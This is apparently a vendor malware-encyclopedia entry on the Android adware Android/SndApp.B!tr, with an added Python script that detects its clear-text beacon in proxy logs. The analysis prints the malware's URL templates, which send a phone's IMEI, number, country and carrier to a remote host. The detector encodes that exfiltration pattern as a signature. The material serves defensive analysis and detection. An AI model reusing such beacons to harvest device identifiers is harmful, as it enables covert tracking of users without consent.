Android/SndApp.B!tr

Analysis

Android/SndApp.B!tr is a variant of Android/SndApp.A!tr.spy.
The malware runs on Android phones, version 2.1 and above.
This variant does not send stored accounts or e-mail addresses. It sends only the following information to a remote web site:

  • IMEI
  • phone number
  • country
  • operator
The remote web site answers with advertisements, which the malware pops up on the phone's screen.


Technical Details


The malware consists of three main components:
  • the main entry point, AirHorn, which is called when the victim launches the application
  • a background service, com.and.snd.AndroidSoundService
  • an install-referrer receiver
When the malware is installed via a referrer, the referrer supplies two parameters, aid and cookieid (see below). The malware then visits the following URL:
http://[CENSORED]66.com/lead/e2c4x2a494x2/&pid=2738&aid=XXX&cookieid=YY
The remote end replies with an affiliate ID, subid, ext and cookie.
Then, when the victim launches the malware, the AirHorn class is created; it checks that the background AndroidSoundService is running and starts it if not.
The malware retrieves the phone's IMEI, line number, network country ISO code and operator name, then visits the following URL:
http://[CENSORED]ios.com/android_notifier/notifier.php?app=airhorn&deviceId=IMEI&mobile=PHONENUMBER&country=COUNTRY&carrier=CARRIER
The IMEI and phone number (at least) are private information and should not be sent without the user's consent, let alone in clear text over HTTP.
Every hour, the malware may display a notification whose title, text and link are all supplied by the remote end.
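The beacon above is easy to spot in egress logs precisely because it is clear-text HTTP with the identifiers in the query string. The following is an added example (not Fortinet's detection logic and not code from the sample) that scans constructed proxy log lines for the notifier.php path and for query parameters carrying an IMEI-shaped value (15 digits with a valid Luhn check digit) or a phone-number-shaped value. The hostnames, client addresses, IMEI and phone number in the sample log are placeholders chosen for the example; the real hosts are censored on this page.

```python
"""Flag clear-text device-identifier exfiltration in HTTP proxy logs.

Added example for the Android/SndApp.B!tr write-up; not Fortinet code.
Log format, hostnames and identifier values below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Beacon path from the analysis; the host is censored there, so match on path only.
BEACON_PATH = "/android_notifier/notifier.php"

# Parameter names (compared case-insensitively) that the analysis reports as
# carrying device data, plus common synonyms. Assumed list, not from the sample.
SENSITIVE_PARAMS = {"deviceid", "mobile", "imei", "phone"}

# Loose E.164-style pattern: optional '+', 8 to 15 digits, no leading zero.
PHONE_RE = re.compile(r"^\+?[1-9]\d{7,14}$")

# Constructed log line format: <timestamp> <client-ip> <method> <url>
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+)")


def luhn_ok(digits):
    """Luhn checksum; an IMEI's 15th digit is a Luhn check digit."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def looks_like_imei(value):
    """15 decimal digits with a valid Luhn check digit."""
    return value.isdigit() and len(value) == 15 and luhn_ok(value)


def looks_like_phone(value):
    return bool(PHONE_RE.match(value))


def inspect_url(url):
    """Return the findings for one URL; an empty list means nothing suspicious."""
    parts = urlsplit(url)
    findings = []
    if parts.scheme == "http" and parts.path == BEACON_PATH:
        findings.append("known beacon path over clear-text HTTP")
    # parse_qs percent-decodes values, so '%2B' becomes '+'. A raw '+' in a
    # logged URL would become a space; encode it as %2B when reproducing logs.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            if looks_like_imei(v):
                findings.append("IMEI-shaped value in parameter %s" % name)
            elif looks_like_phone(v) and name.lower() in SENSITIVE_PARAMS:
                # Phone check is gated on the parameter name to avoid flagging
                # every long numeric id (cookie ids, campaign ids, ...).
                findings.append("phone-number-shaped value in parameter %s" % name)
    return findings


def scan_log(lines):
    """Return (client-ip, url, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_url(m.group("url"))
        if findings:
            hits.append((m.group("src"), m.group("url"), findings))
    return hits


# Constructed sample log. Line 1 mirrors the install-time lead request (no
# device identifiers), line 2 the hourly notifier beacon, line 3 benign traffic.
SAMPLE_LOG = [
    "2019-04-12T10:00:01Z 10.0.0.5 GET "
    "http://lead.example.test/lead/e2c4x2a494x2/&pid=2738&aid=123&cookieid=45",
    "2019-04-12T10:01:07Z 10.0.0.5 GET "
    "http://notifier.example.test/android_notifier/notifier.php?"
    "app=airhorn&deviceId=490154203237518&mobile=%2B15551234567&country=us&carrier=ExampleCell",
    "2019-04-12T10:02:30Z 10.0.0.7 GET https://www.example.test/index.html?q=weather",
]

if __name__ == "__main__":
    for src, url, findings in scan_log(SAMPLE_LOG):
        print(src, url)
        for f in findings:
            print("  -", f)
```

The Luhn check matters: without it, any 15-digit number (an order id, a session token) in a query string is flagged as an IMEI. Note that the first request in the sample contains no device data at all, which matches the analysis: the aid/cookieid exchange is affiliate bookkeeping, and the privacy problem is the second request.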

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

Product                     Availability
FortiGate                   Extreme
FortiClient                 Extended
FortiMail                   Extended
FortiSandbox                Extended
FortiWeb                    Extended
Web Application Firewall    Extended
FortiIsolator               Extended
FortiDeceptor               Extended
FortiEDR

Version Updates

Date         Version     Detail
2019-04-12   67.75300